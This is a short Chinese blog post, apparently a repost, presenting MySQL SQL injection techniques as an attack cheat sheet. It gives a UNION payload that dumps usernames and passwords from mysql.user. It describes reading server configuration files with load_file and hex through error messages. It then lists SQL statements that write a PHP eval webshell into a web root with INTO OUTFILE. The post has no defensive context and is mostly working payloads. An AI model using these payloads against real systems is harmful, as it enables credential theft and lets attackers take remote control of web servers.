首页 > 其他 > 详细

一些注入的姿势以及函数利用

时间:2018-03-04 00:55:39      阅读:232      评论:0      收藏:0      [点我收藏+]

mysql:

0x01

 

技术分享图片

用load_fileh函数和hex函数配合,提高注入兼容性,利用错误提示来获取配置文件原始内容

以上load-file后跟的是文件位置路径,surname后跟的就是对应文件的hex值

技术分享图片

group_concat函数与concat函数功能类似,将多个查询结果显示在一个显示位置里,拼接成一个查询结果,为了保持清晰,中间用一些符号的hex值,可以利用符号隔开。

爆数据库的方法一:1‘ and 1=2 union select 1, concat(user,0x5f,password) from mysql.user #)
爆数据库的方法二:如果方法一的用户密码是加密后的,无法解密,可以直接从配置文件解开尝试。语句见博客第一张图,配置文件hex解密后有mysql用户密码


技术分享图片

可以用winhex转码存储文件,我一般喜欢用hackbar自带的。可以看到文件是一个php。

 

0x02

利用注入写入webshell姿势:

 

Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES("<?php @eval($_POST[‘6um1n‘]);?>"); //把php一句话木马插入到temp表
Select cmd from temp into out file ‘C:/xampp/xampp/htdocs/shell.php‘; //查询temp表中的一句话并把结果导入到shell.php
Drop TABLE IF EXISTS temp; //删除temp

#以上也可简化为:
#Select "<?php @eval($_POST[‘6um1n‘]);?>" into outfile ‘C:/xampp/xampp/htdocs/shell.php‘  后面跟上物理地址,前提根据报错或者phpinfo看到地址


 

一些注入的姿势以及函数利用

原文:https://www.cnblogs.com/drkang/p/8497142.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!